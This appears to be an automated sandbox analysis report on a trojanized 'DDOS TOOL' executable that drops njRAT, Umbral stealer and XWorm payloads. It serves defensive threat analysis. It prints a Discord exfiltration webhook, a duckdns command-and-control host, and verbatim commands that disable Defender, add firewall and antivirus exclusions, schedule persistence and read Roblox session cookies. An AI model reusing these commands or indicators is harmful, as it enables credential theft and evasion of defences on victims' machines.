njrat | 1ca55fa09e6c8aa17f5e9703380ea358e812d1452d452f06a3916cc8a87463fa

Analysis

max time kernel
62s
max time network
63s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27-08-2024 15:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DDOS TOOL/DDOS TOOL.exe
Size

5.3MB
MD5

4356e6504e19b8a4014dbfacbc89493f
SHA1

a4078eabcc6760e184259d694b7251b89569453a
SHA256

e3a9ffb17c734d02950cdfcd38592549181d9f95220b8aaae69d6091480a8d42
SHA512

83949b7422c6e2efcf6888e5c324ee8d536716f571156bdb4672e989aa68a1be5b7e6f0b5024e7c47af3f16ef0667045fda050f5dbc1272a491febdd249b7fe3
SSDEEP

98304:9fIGp26lE8kKlr8iRqJxf+n/FHkLUfzv3QtRiBNyZWa8QEHE:9lEWrct+ntHkQfzPlpaz

Score

10^/10

njrat umbral xworm credential_access discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1260642913709199370/cN_Wnccw0kdFSTwqONW2fMDnifHoEhjQp9n_8tPGu3gI5coO14fm3gGZ1Q04Hstg1nAO

Extracted

Family

xworm

Version

5.0

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes

Install_directory
%AppData%
install_file
Ondrive.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000800000001e55f-23.dat	family_umbral
behavioral2/memory/4488-25-0x000001B851240000-0x000001B851280000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0002000000022ab4-52.dat	family_xworm
behavioral2/memory/1816-57-0x00000000005F0000-0x0000000000600000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3692	powershell.exe
4208	powershell.exe
604	powershell.exe
1184	powershell.exe
368	powershell.exe
4956	powershell.exe
3092	powershell.exe
3820	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	HYDRA.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3932	netsh.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	DDOS TOOL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	Server.exe

Executes dropped EXE 7 IoCs

pid	Process
4296	Server.exe
4488	HYDRA.exe
3180	Server.exe
5108	DDoS_Tool.exe
1816	conhost.exe
2532	DDoS_Tool.exe
748	server.exe

Loads dropped DLL 7 IoCs

pid	Process
2532	DDoS_Tool.exe
2532	DDoS_Tool.exe
2532	DDoS_Tool.exe
2532	DDoS_Tool.exe
2532	DDoS_Tool.exe
2532	DDoS_Tool.exe
2532	DDoS_Tool.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
37	discord.com
38	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0002000000022ab2-34.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3368	cmd.exe
1580	PING.EXE
1408	PING.EXE
1188	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5036	wmic.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
1580	PING.EXE
1408	PING.EXE
1188	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3384	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1816	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3820	powershell.exe
3820	powershell.exe
3820	powershell.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
368	powershell.exe
368	powershell.exe
368	powershell.exe
4488	HYDRA.exe
4488	HYDRA.exe
4956	powershell.exe
4956	powershell.exe
4956	powershell.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
1412	powershell.exe
1412	powershell.exe
1412	powershell.exe
604	powershell.exe
604	powershell.exe
604	powershell.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe
748	server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4488	HYDRA.exe
Token: SeDebugPrivilege	1816	conhost.exe
Token: SeIncreaseQuotaPrivilege	4544	wmic.exe
Token: SeSecurityPrivilege	4544	wmic.exe
Token: SeTakeOwnershipPrivilege	4544	wmic.exe
Token: SeLoadDriverPrivilege	4544	wmic.exe
Token: SeSystemProfilePrivilege	4544	wmic.exe
Token: SeSystemtimePrivilege	4544	wmic.exe
Token: SeProfSingleProcessPrivilege	4544	wmic.exe
Token: SeIncBasePriorityPrivilege	4544	wmic.exe
Token: SeCreatePagefilePrivilege	4544	wmic.exe
Token: SeBackupPrivilege	4544	wmic.exe
Token: SeRestorePrivilege	4544	wmic.exe
Token: SeShutdownPrivilege	4544	wmic.exe
Token: SeDebugPrivilege	4544	wmic.exe
Token: SeSystemEnvironmentPrivilege	4544	wmic.exe
Token: SeRemoteShutdownPrivilege	4544	wmic.exe
Token: SeUndockPrivilege	4544	wmic.exe
Token: SeManageVolumePrivilege	4544	wmic.exe
Token: 33	4544	wmic.exe
Token: 34	4544	wmic.exe
Token: 35	4544	wmic.exe
Token: 36	4544	wmic.exe
Token: 35	2532	DDoS_Tool.exe
Token: SeIncreaseQuotaPrivilege	4544	wmic.exe
Token: SeSecurityPrivilege	4544	wmic.exe
Token: SeTakeOwnershipPrivilege	4544	wmic.exe
Token: SeLoadDriverPrivilege	4544	wmic.exe
Token: SeSystemProfilePrivilege	4544	wmic.exe
Token: SeSystemtimePrivilege	4544	wmic.exe
Token: SeProfSingleProcessPrivilege	4544	wmic.exe
Token: SeIncBasePriorityPrivilege	4544	wmic.exe
Token: SeCreatePagefilePrivilege	4544	wmic.exe
Token: SeBackupPrivilege	4544	wmic.exe
Token: SeRestorePrivilege	4544	wmic.exe
Token: SeShutdownPrivilege	4544	wmic.exe
Token: SeDebugPrivilege	4544	wmic.exe
Token: SeSystemEnvironmentPrivilege	4544	wmic.exe
Token: SeRemoteShutdownPrivilege	4544	wmic.exe
Token: SeUndockPrivilege	4544	wmic.exe
Token: SeManageVolumePrivilege	4544	wmic.exe
Token: 33	4544	wmic.exe
Token: 34	4544	wmic.exe
Token: 35	4544	wmic.exe
Token: 36	4544	wmic.exe
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeIncreaseQuotaPrivilege	2068	wmic.exe
Token: SeSecurityPrivilege	2068	wmic.exe
Token: SeTakeOwnershipPrivilege	2068	wmic.exe
Token: SeLoadDriverPrivilege	2068	wmic.exe
Token: SeSystemProfilePrivilege	2068	wmic.exe
Token: SeSystemtimePrivilege	2068	wmic.exe
Token: SeProfSingleProcessPrivilege	2068	wmic.exe
Token: SeIncBasePriorityPrivilege	2068	wmic.exe
Token: SeCreatePagefilePrivilege	2068	wmic.exe
Token: SeBackupPrivilege	2068	wmic.exe
Token: SeRestorePrivilege	2068	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 4296	2156	DDOS TOOL.exe	88
PID 2156 wrote to memory of 4296	2156	DDOS TOOL.exe	88
PID 2156 wrote to memory of 4488	2156	DDOS TOOL.exe	89
PID 2156 wrote to memory of 4488	2156	DDOS TOOL.exe	89
PID 4296 wrote to memory of 3180	4296	Server.exe	91
PID 4296 wrote to memory of 3180	4296	Server.exe	91
PID 4296 wrote to memory of 3180	4296	Server.exe	91
PID 2156 wrote to memory of 5108	2156	DDOS TOOL.exe	90
PID 2156 wrote to memory of 5108	2156	DDOS TOOL.exe	90
PID 4296 wrote to memory of 1816	4296	Server.exe	93
PID 4296 wrote to memory of 1816	4296	Server.exe	93
PID 4488 wrote to memory of 4544	4488	HYDRA.exe	94
PID 4488 wrote to memory of 4544	4488	HYDRA.exe	94
PID 5108 wrote to memory of 2532	5108	DDoS_Tool.exe	96
PID 5108 wrote to memory of 2532	5108	DDoS_Tool.exe	96
PID 2532 wrote to memory of 3524	2532	DDoS_Tool.exe	98
PID 2532 wrote to memory of 3524	2532	DDoS_Tool.exe	98
PID 2532 wrote to memory of 1204	2532	DDoS_Tool.exe	99
PID 2532 wrote to memory of 1204	2532	DDoS_Tool.exe	99
PID 2532 wrote to memory of 4740	2532	DDoS_Tool.exe	100
PID 2532 wrote to memory of 4740	2532	DDoS_Tool.exe	100
PID 1816 wrote to memory of 3820	1816	conhost.exe	104
PID 1816 wrote to memory of 3820	1816	conhost.exe	104
PID 1816 wrote to memory of 1184	1816	conhost.exe	106
PID 1816 wrote to memory of 1184	1816	conhost.exe	106
PID 1816 wrote to memory of 368	1816	conhost.exe	108
PID 1816 wrote to memory of 368	1816	conhost.exe	108
PID 4488 wrote to memory of 3368	4488	HYDRA.exe	110
PID 4488 wrote to memory of 3368	4488	HYDRA.exe	110
PID 4488 wrote to memory of 4956	4488	HYDRA.exe	112
PID 4488 wrote to memory of 4956	4488	HYDRA.exe	112
PID 1816 wrote to memory of 3092	1816	conhost.exe	114
PID 1816 wrote to memory of 3092	1816	conhost.exe	114
PID 4488 wrote to memory of 3692	4488	HYDRA.exe	116
PID 4488 wrote to memory of 3692	4488	HYDRA.exe	116
PID 4488 wrote to memory of 4208	4488	HYDRA.exe	119
PID 4488 wrote to memory of 4208	4488	HYDRA.exe	119
PID 4488 wrote to memory of 1412	4488	HYDRA.exe	122
PID 4488 wrote to memory of 1412	4488	HYDRA.exe	122
PID 1816 wrote to memory of 3384	1816	conhost.exe	124
PID 1816 wrote to memory of 3384	1816	conhost.exe	124
PID 4488 wrote to memory of 2068	4488	HYDRA.exe	126
PID 4488 wrote to memory of 2068	4488	HYDRA.exe	126
PID 3180 wrote to memory of 748	3180	Server.exe	128
PID 3180 wrote to memory of 748	3180	Server.exe	128
PID 3180 wrote to memory of 748	3180	Server.exe	128
PID 4488 wrote to memory of 4852	4488	HYDRA.exe	129
PID 4488 wrote to memory of 4852	4488	HYDRA.exe	129
PID 4488 wrote to memory of 396	4488	HYDRA.exe	131
PID 4488 wrote to memory of 396	4488	HYDRA.exe	131
PID 4488 wrote to memory of 604	4488	HYDRA.exe	133
PID 4488 wrote to memory of 604	4488	HYDRA.exe	133
PID 4488 wrote to memory of 5036	4488	HYDRA.exe	135
PID 4488 wrote to memory of 5036	4488	HYDRA.exe	135
PID 4488 wrote to memory of 3368	4488	HYDRA.exe	139
PID 4488 wrote to memory of 3368	4488	HYDRA.exe	139
PID 3368 wrote to memory of 1580	3368	cmd.exe	141
PID 3368 wrote to memory of 1580	3368	cmd.exe	141
PID 748 wrote to memory of 3932	748	server.exe	149
PID 748 wrote to memory of 3932	748	server.exe	149
PID 748 wrote to memory of 3932	748	server.exe	149
PID 4372 wrote to memory of 1408	4372	cmd.exe	152
PID 4372 wrote to memory of 1408	4372	cmd.exe	152
PID 4372 wrote to memory of 1188	4372	cmd.exe	156

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3368	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DDOS TOOL\DDOS TOOL.exe
"C:\Users\Admin\AppData\Local\Temp\DDOS TOOL\DDOS TOOL.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4296
- - C:\Users\Admin\AppData\Roaming\Server.exe
    "C:\Users\Admin\AppData\Roaming\Server.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Users\Admin\AppData\Local\Temp\server.exe
      "C:\Users\Admin\AppData\Local\Temp\server.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:748
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3932
- - C:\Users\Admin\AppData\Roaming\conhost.exe
    "C:\Users\Admin\AppData\Roaming\conhost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3092
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3384
- C:\Users\Admin\AppData\Local\Temp\HYDRA.exe
  "C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4544
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"
    3⤵
    - Views/modifies file attributes
    PID:3368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HYDRA.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2068
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4852
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:604
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5036
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\HYDRA.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3368
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1580
- C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe
  "C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe
    "C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c title DDoS Tool by HʎDRΔ
      4⤵
      PID:3524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:1204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:4740

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4372
- C:\Windows\system32\PING.EXE
  ping youtube.com
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1408
- C:\Windows\system32\PING.EXE
  ping 216.58.214.174
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c65738617888921a153bd9b1ef516ee7

SHA1
5245e71ea3c181d76320c857b639272ac9e079b1

SHA256
4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

SHA512
2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec79fae4e7c09310ebf4f2d85a33a638

SHA1
f2bdd995b12e65e7ed437d228f22223b59e76efb

SHA256
e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a

SHA512
af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

Download Submit
C:\Users\Admin\AppData\Local\Temp\DDoS_Tool.exe

Filesize
5.2MB

MD5
0b119327f1046d6917d7018312ac8e32

SHA1
3562ca03b61381ba727d8dac8da7bd24647eb9fc

SHA256
8adadd0edb3da0a3bebce706c8f8acd4a07c77abdf7e66c712fb61189a5c81ed

SHA512
